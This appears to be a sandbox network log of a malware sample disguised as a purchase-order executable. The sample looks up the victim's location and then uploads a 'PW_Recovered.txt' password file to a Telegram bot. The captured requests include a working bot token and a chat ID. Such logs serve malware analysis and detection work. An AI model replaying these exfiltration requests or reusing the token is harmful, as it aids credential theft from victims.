2024-12-16 13:14:29 UTC	878	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:14:29 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 343638 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3XAIan3YTm406VSHDiKJ8I4Xm0kmFTk%2FaRdA5CFeUdSGFevidybgztYLl8p8MCEW9BQMmwqhESnwbH0inCDxj2kY9BHkPB28k1jAh%2FH7%2Fl5YONVLwPEM20VAcnUjZc33AFW%2FrMGb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2eefcedbc3191e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1524&min_rtt=1512&rtt_var=592&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1810291&cwnd=238&unsent_bytes=0&cid=3faab275762e9146&ts=453&x=0"
2024-12-16 13:14:29 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49751	172.67.177.134	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:14:33 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-16 13:14:33 UTC	876	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:14:33 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 343642 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xkbYOvaOwRkic0zXM%2BD8KPAvFstuq8ITfz2%2B4nA6YWC4QbcxxttT4fHU0CHYbTGuqmpLe4KKhuRreSwWYbh8%2FvoyQEauoWR1X8bgZKLwTxAzJoF4Mj3smxPgJIEODpnNqdHvTQje"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2eefe64f63c354-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1622&min_rtt=1620&rtt_var=613&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1778319&cwnd=178&unsent_bytes=0&cid=3a8ebb0a85999857&ts=457&x=0"
2024-12-16 13:14:33 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49753	172.67.177.134	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:14:37 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-16 13:14:37 UTC	882	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:14:37 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 343646 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BOfFlnI2JlI%2B5s5Pey%2F0qv3QSQYHc1u5qArKnrVre5ai76tKvNzq1c3TqPNV%2FWLZcnYj3X8OroHaHPLNJBgU6lnyPxxhKYqQKg3QnMF9oTjGlbHazIzZJT0hClnMJ8s8%2BzBXZ3%2FU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2ef00009f942ad-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1660&min_rtt=1652&rtt_var=635&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1700640&cwnd=242&unsent_bytes=0&cid=e8a805fb964467b7&ts=456&x=0"
2024-12-16 13:14:37 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49755	172.67.177.134	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:14:40 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-16 13:14:40 UTC	878	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:14:40 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 343649 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=07vtGzwnG%2BbRRUyjcozGB3HZr02JFBoGL5m7Q86hdDdBzkoLgofn7c%2BYkMUhN%2FldxZvbFsb%2FNW8HOIjPTR2CxyH1w84MRIzlfczAT1YzWfX4uKz0NEwfVh1kyiD8AJ9aCbIA2w0Q"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2ef0147f0c4397-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2992&min_rtt=1626&rtt_var=1586&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1795817&cwnd=79&unsent_bytes=0&cid=0fe46f90b4e40023&ts=451&x=0"
2024-12-16 13:14:40 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49757	172.67.177.134	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:14:43 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-16 13:14:44 UTC	877	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:14:44 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 343653 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YbM2vtxv4XxztOL9yM11Mo1PqI2PHEa0m3BQ5GRVytY%2Bq1PziwJOaGj5tbAkh6LwXmBZxIYpVYm9WqHwtGSrqG4wUqG2FIKW2OZYOAqmb2auGK1iCGYUILhSkHkQgI%2F%2BfS0kxxcO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2ef029a9350f49-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5281&min_rtt=1754&rtt_var=2928&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1664766&cwnd=215&unsent_bytes=0&cid=ece921fdfdd3cedc&ts=500&x=0"
2024-12-16 13:14:44 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49758	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:14:45 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:472847%0D%0ADate%20and%20Time:%2017/12/2024%20/%2015:46:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20472847%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-12-16 13:14:46 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:14:46 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:14:46 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49759	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:14:54 UTC	345	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd1f358331f29d Host: api.telegram.org Content-Length: 581
2024-12-16 13:14:54 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 33 35 38 33 33 31 66 32 39 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8dd1f358331f29dContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:14:54 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:14:54 GMT Content-Type: application/json Content-Length: 528 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:14:54 UTC	528	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 31 37 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 38 39 34 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17179,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354894,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49792	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:15:17 UTC	369	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd209fbe2647cc Host: api.telegram.org Content-Length: 581 Connection: Keep-Alive
2024-12-16 13:15:17 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 39 66 62 65 32 36 34 37 63 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8dd209fbe2647ccContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:15:18 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:15:18 GMT Content-Type: application/json Content-Length: 528 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:15:18 UTC	528	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 31 38 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 31 38 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17181,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354918,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49797	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:15:19 UTC	369	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd20cf8d16151b Host: api.telegram.org Content-Length: 581 Connection: Keep-Alive
2024-12-16 13:15:19 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 63 66 38 64 31 36 31 35 31 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8dd20cf8d16151bContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:15:20 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:15:19 GMT Content-Type: application/json Content-Length: 528 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:15:20 UTC	528	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 31 38 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 31 39 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17183,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354919,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49803	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:15:21 UTC	345	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd20fb68695da8 Host: api.telegram.org Content-Length: 581
